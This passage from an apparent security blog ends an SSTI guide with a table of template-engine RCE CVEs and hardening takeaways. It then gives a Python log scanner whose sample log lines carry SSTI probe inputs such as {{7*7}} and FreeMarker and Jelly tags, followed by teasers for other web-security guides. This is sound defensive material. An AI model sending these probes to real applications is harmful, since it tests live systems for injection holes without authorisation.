| CVE-2024-29178 | Apache StreamPark | FreeMarker | – | FreeMarker SSTI to RCE |
| CVE-2019-20920 | Handlebars (npm) | Handlebars | – | Prototype pollution leading to RCE |
| GHSA-2m7x-c7px-hp58 | Grav CMS | Twig | – | RCE via setEscaper() without sandbox |
| GHSA-c34r-238x-f7qx | Fides | Jinja2 | – | RCE via unsandboxed email template rendering |

Key Takeaways

- Input Validation: Never trust user input in template contexts
- Template Isolation: Separate user-controlled and system templates
- Minimal Privileges: Restrict template engine capabilities
- Regular Testing: Include SSTI in security testing processes
- Framework Updates: Keep template engines updated with security patches
- Sandbox Enforcement: Always enable sandbox mode when user content is rendered by template engines
- Prototype Pollution Awareness: In Node.js, prototype pollution can chain to full SSTI/RCE even in “logicless” engines like Handlebars
- Context Minimization: Pass only minimal data structures to templates — never entire framework contexts (Go, Spring)
- Container Hardening: Run applications as non-root to limit post-exploitation impact
- Supply Chain Monitoring: Track template engine dependency vulnerabilities in CI/CD

This guide compiles practical SSTI knowledge from 40 research sources. Template injection vulnerabilities remain common due to the complexity of modern template engines and their powerful features. The attack surface extends beyond traditional web frameworks to message-driven architectures (Apache Camel), CMS platforms (Alfresco, Grav), enterprise IT management (ServiceNow), and Node.js prototype pollution chains.
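The Log Analysis items under Monitoring & Detection, worked as an added example (not code from the guide or any project it names): a scanner that flags the template delimiters the guide lists when they appear in request parameters of access-log lines, decoding repeatedly so double-encoded input is not missed. The log lines, rule names and MAX_ROUNDS value are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Delimiters the guide lists under "Unusual template patterns".
RULES = {
    "double-curly": re.compile(r"\{\{"),
    "dollar-brace": re.compile(r"\$\{"),
    "freemarker-directive": re.compile(r"<#"),
    "jelly-tag": re.compile(r"<\s*[gj]:\w+", re.I),
}
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
MAX_ROUNDS = 3  # assumption: enough to unwrap double or triple URL-encoding

# Constructed access-log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/May/2026:10:00:01 +0000] "GET /search?q=shoes HTTP/1.1" 200 512',
    '203.0.113.7 - - [02/May/2026:10:00:02 +0000] "GET /search?q=%7B%7B7*7%7D%7D HTTP/1.1" 200 498',
    '203.0.113.7 - - [02/May/2026:10:00:03 +0000] "GET /profile?name=%2524%257B7*7%257D HTTP/1.1" 500 87',
    '203.0.113.7 - - [02/May/2026:10:00:04 +0000] "GET /login.do?jvar_page_title=%3Cg%3Aevaluate%3E HTTP/1.1" 200 903',
    '203.0.113.7 - - [02/May/2026:10:00:05 +0000] "GET /render?tpl=%3C%23assign+x%3D1%3E HTTP/1.1" 200 64',
]

def fully_decode(value):
    """Percent-decode until stable so %257B%257B is still seen as {{."""
    for _ in range(MAX_ROUNDS):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_target(target):
    """Return sorted (parameter, rule) pairs for one request target."""
    parts = urlsplit(target)
    on_login = parts.path.lower().endswith("/login.do")
    hits = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        text = fully_decode(value)  # parse_qsl already decoded one layer
        for rule, pattern in RULES.items():
            if pattern.search(text):
                # The guide singles out login.do for Jelly tag injection.
                if rule == "jelly-tag" and on_login:
                    rule = "jelly-tag-on-login.do"
                hits.add((name, rule))
    return sorted(hits)

def scan_log(lines):
    """Return (line_number, parameter, rule) for every flagged request."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match:
            findings.extend((number, p, r) for p, r in scan_target(match.group(1)))
    return findings
```

Hits from a scanner like this feed the Detection phase of the incident response table; parameters that legitimately carry template-like text need an allowlist before alerting on them.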

April 10, 2026 · 16 min · Carl Sampson

Comprehensive Session Management Security Guide

🆕 Enhanced May 2, 2026 - Updated with session CVEs and management techniques including cookie security flaws, token vulnerabilities, and modern session attack vectors. A practitioner’s reference for session management security — session attacks, cookie security, token vulnerabilities, exploitation techniques, and defense strategies. Covers traditional and modern session management from web applications to APIs. 🔥 Latest Update: May 2, 2026 - Enhanced with 2026 critical session CVEs including CVE-2026-5707 (AWS RES Root RCE), CVE-2025-55315 (ASP.NET Core), CVE-2025-24813 (Apache Tomcat) covering cloud and enterprise session vulnerabilities. ...

May 2, 2026 · 4 min · Carl Sampson

Comprehensive Business Logic Flaws Guide

A practitioner’s reference for business logic vulnerabilities — workflow bypass, race conditions, payment logic flaws, privilege escalation chains, and application context attacks. Enhanced with 2026 critical CVEs from 339 research insights across 27 CVE discoveries. 🆕 Newly Created: May 2, 2026 - Complete new guide built from 339 automated insights covering workflow bypass, race conditions, payment logic, and attack chains with 27 critical CVEs from comprehensive security research analysis. ...

May 2, 2026 · 8 min · Carl Sampson

OWASP A01: Broken Access Control Prevention Guide

I’ve been hunting access control bugs for over a decade, and let me tell you - they’re everywhere. When OWASP moved broken access control to #1 in 2025 and merged SSRF into this category, I wasn’t surprised. I was relieved that the security community finally caught up to what I’ve been seeing in the wild. 94% of applications tested have broken access control issues. That’s not a typo - it’s a security apocalypse hiding in plain sight. ...

May 6, 2026 · Carl Sampson

OWASP Top 10 2025 Developer Guide

I’ve been working with the OWASP Top 10 for years, and the 2025 update just dropped some major changes that every developer needs to understand. Supply chain attacks finally made it into the top 10 (as A03), and honestly, it’s about time. I’ve been seeing these attacks destroy companies for the past few years. Here’s the thing about OWASP Top 10 2025: it’s not just updating the old list - it’s completely rethinking modern threats. Security misconfiguration jumped from #5 to #2, and they merged SSRF into broken access control because that’s how attackers actually chain these vulnerabilities together. ...

May 5, 2026 · Carl Sampson

Python SSRF Prevention Guide [2026]

I’ve been hunting SSRF bugs in Python applications for over five years, and the number of vulnerable codebases I encounter is honestly terrifying. Flask apps with requests.get(user_input) scattered everywhere. Django views that blindly fetch URLs from form data. FastAPI endpoints that turn your server into an attacker’s proxy. The worst part? Most developers don’t realize they’re building SSRF vulnerabilities until it’s too late. By then, attackers have already stolen your AWS credentials or mapped your entire internal network. ...

May 1, 2026 · Carl Sampson

CSRF vs SSRF: Developer Guide [2026]

CSRF and SSRF sound like they’re related - they both have “request forgery” in the name, after all. But they’re completely different beasts that’ll bite you in completely different ways. I’ve spent way too many nights debugging both of these vulnerabilities, and the confusion between them has cost teams serious security incidents. Let me break down exactly what each one does and how to stop them before they wreck your app. ...

May 1, 2026 · Carl Sampson

Understanding HTTP Request Smuggling Attacks

HTTP Request Smuggling (HRS) is a powerful web application vulnerability that exploits discrepancies in how different servers or intermediaries parse and handle HTTP requests. This misalignment can allow an attacker to “smuggle” a malicious request through a front-end server (such as a load balancer, proxy, or CDN) so that it is interpreted differently by the back-end server. How HTTP Request Smuggling Works Modern web applications often rely on chains of intermediaries — proxies, reverse proxies, CDNs, and application servers. These components must all agree on where one HTTP request ends and the next begins. If they disagree, attackers can craft specially malformed requests that cause desynchronization. ...

September 6, 2025 · Carl Sampson

Content Security Policy Complete Guide [2026]

Content Security Policy (CSP) is a browser security mechanism that controls which resources a web page is allowed to load. By declaring a policy via HTTP header, you tell the browser exactly which scripts, styles, images, fonts, and connections are permitted. Anything not explicitly allowed is blocked. CSP is one of the most effective defenses against Cross-Site Scripting (XSS) and data injection attacks. How CSP Works CSP is delivered as an HTTP response header: ...

February 23, 2023 · Carl Sampson